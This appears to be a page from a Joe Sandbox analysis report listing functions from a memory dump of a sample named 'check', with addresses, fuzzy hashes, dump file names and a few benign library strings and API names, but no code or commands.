Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID:
String ID: incorrect header check$invalid window size
API String ID: 0-900081337
Opcode ID: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
Instruction ID: 614a4627a6d0e942a7bbbad79c0b753d3366e4d65d87f69a6fd743cc522f0d84
Opcode Fuzzy Hash: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
Instruction Fuzzy Hash: 3591C972A18EC587E7F49B16C448B3E7AA9FF54B64F014179EA4A86790DF38F940CB40

Function 00007FF61E8FDEF0 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

e+000, xrefs: 00007FF61E8FDFFD
gfff, xrefs: 00007FF61E8FE07A

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
Instruction ID: 7a433efe95dc97c337289d4a4a91aa600a8a899d3ba92a2be330f4a5a6b7535d
Opcode Fuzzy Hash: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
Instruction Fuzzy Hash: C0515962B18AC546E7658E359800769AB91F7A4FB4F48C231EBA8C7AD5CF3DE4418701

Function 00007FF61E9008C8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
Instruction ID: 41da1f39cd7bd11f0bf9add05cae80717d2372e1c31f79947361c8623b6b1c7a
Opcode Fuzzy Hash: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
Instruction Fuzzy Hash: E6025532A2DE4341FAA5AB2595102796698AF65FB0F858E35FE6DC63D3DE3CF4418300

Function 00007FF61E8FDA5C Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF61E8FDD9E

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction ID: 547bc64aff0a81b6828252934ea7c26f392cd7a6007487971281155407b0e3a9
Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction Fuzzy Hash: 52A14662A08BCA47EB61CF25A4007A97B91EB60FA4F048132EFAD877C5DE3DE501C701

Function 00007FF61E8F8794 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

TMP, xrefs: 00007FF61E8F87B3

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: TMP
API String ID: 3215553584-3125297090
Opcode ID: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
Instruction ID: 4b158a54230e9ce72098599b153659d5da07ccf999c3a87ae5aade08d58f7acd
Opcode Fuzzy Hash: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
Instruction Fuzzy Hash: 0351BF11F28E2241FBA4AB27591117A9294AF64FF4F488435FE1ED77D6EE3CF4428200

Function 00007FF61E903480 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF61E903484

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
Instruction ID: ffbb9cbf60a3816002a12fb1352857cce987f0611d844c9dad87c9d55a174024
Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
Instruction Fuzzy Hash: E9B09220E17E03C2EE086B256C8222822A87F78B20F980538D00DC0332EE2C70E55700

Function 00007FF61E8F35A0 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
Instruction ID: ae116421d2eb4cae23a6d6f04d4aea74d17aee23a146a1da09c163071b66cc01
Opcode Fuzzy Hash: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
Instruction Fuzzy Hash: 0FD1DF72E18E4286EBA98E29805027D27A0EF25F68F244239EE0D977D5DF3DF845D740

Function 00007FF61E8E9800 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
Instruction ID: f569e86bdeccf41984f470858ce34a3f956d7e8a974da3615b1729e5075f2387
Opcode Fuzzy Hash: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
Instruction Fuzzy Hash: B4C19D762181E08BD28AEB29E46947A73E1F78930DB99406BEF87477C5CB3CE514DB10

Function 00007FF61E8F2C10 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
Instruction ID: 81b04a7bb083b98a6d4d563e97cb30fd270218fa3f4781007861bbf9042a2fe8
Opcode Fuzzy Hash: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
Instruction Fuzzy Hash: 6BB18C72918F8586E7A5CF29C05027C3BA0EB69F68F240235EA4E87396CF3DE451C755

Function 00007FF61E8FE570 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
Instruction ID: e0c8e1abd3379927fb6189d1a976e2cf406f728c3c6e6c3484e36ae7f1e1f197
Opcode Fuzzy Hash: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
Instruction Fuzzy Hash: 1C81B272A18B8546E7B4CF19944036A6A91FB65FB4F144235FA9E87BD9DF3CF5008B00

Function 00007FF61E906418 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 21aaab296e2e64a79b20cf98ea2699a9ab0529386423cc159892306e5cd43e00
Instruction ID: 5a791bbf128f299860060eca10f2e5296e205cc54aa55a9bfa2b3daaccb7cf65
Opcode Fuzzy Hash: 21aaab296e2e64a79b20cf98ea2699a9ab0529386423cc159892306e5cd43e00
Instruction Fuzzy Hash: 8F61E472E18A5246FB648A68945063D6688AF61F74FA40A39F61DC3EC7DF7DF800C780

Function 00007FF61E8F1D54 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction ID: a30809e30264d80b66bb8d4ac89bf7c32e72d44b11ba4d472970f9aa4012b3b7
Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction Fuzzy Hash: 34516476A18E5186E7A58B29C05022833F0EB66F78F244235EA8D97795CF3EF853C740

Function 00007FF61E8F1944 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction ID: ed5f733bf672f5650ccc79adb305e91d3e244f78f73701bd9adb8fae8f93b65b
Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction Fuzzy Hash: 33515476B14E5186E7A48B29C04022837E0EB66F78F644135EA8D97796DF3EF853C780

Function 00007FF61E8F2164 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction ID: 37fb1ea26374eef94dfca6d4a737477b3310cb1bce05296f297faae650665de9
Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction Fuzzy Hash: 6C517176A18E5286E7A48B29D44023877A1EB64F78F244131EE4D977A4CF3EF893C744

Function 00007FF61E8F1740 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction ID: 3c19ccc48544bec61477d28bacd460b74672be0d8714fa8f2bb7466941509d27
Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction Fuzzy Hash: 31514576F24A5185E7A48B29C04423877E1EB66F68F244131DE4D97799CF3EF842D740

Function 00007FF61E8F1F60 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction ID: 1108417b1bb83d55c445156e808b6895887e4cf5d7cea22d5acf7ff923053c5e
Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction Fuzzy Hash: 42515137A18E5586E7A48B29C04423837A1EBA5F68F244131EE4D977A5CF3EF853D740

Function 00007FF61E8F1B50 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction ID: 1a25b55bceb251a99a4cb63813f398a93bf39c69556916c9b0b7d4fb55c855fd
Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction Fuzzy Hash: 34517F36A18E61C6E7A58B29C05023827E1EB66F68F245131EE4D97796DF3EF843C740

Function 00007FF61E8F5D30 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction ID: 07685c03a199412398efd7051397ac779f8ff3c7babed83deec59126024dc8d0
Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction Fuzzy Hash: 3641626284BF4A05E9EA8B1805286B426809F32FB0F5853B4ED9DD73D7CD1DFD86C120

Function 00007FF61E8F9EA0 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
Instruction ID: 267f68815881d1b3f3ff4bba7d79b2e0685f598f7a39fb651d8964275790098d
Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
Instruction Fuzzy Hash: 1C41E172718E5582EF44CF6AE914169A3A5FB58FE0B49A436FE0DD7B58DE3DE0428300

Function 00007FF61E8F80E4 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
Instruction ID: af138763f416a34ffed9fe03c9c3460cdac1f3cb64aceb29870d82cb773d8b3e
Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
Instruction Fuzzy Hash: FA31A432719F8281E7A49F25684012DAAD9AB95FF0F144239FA5DD3BD6DF3CE0118704

Function 00007FF61E909570 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
Instruction ID: bcbf677b9e97b4ceb171ddd7c2a3b2bd28503bb05b312b899fefda3d3d837e6d
Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
Instruction Fuzzy Hash: D6F044717186978ADBA8DF79A40262977D0F768790F80C839E989C3A14DE3CD1518F04

Function 00007FF61E8ED30C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

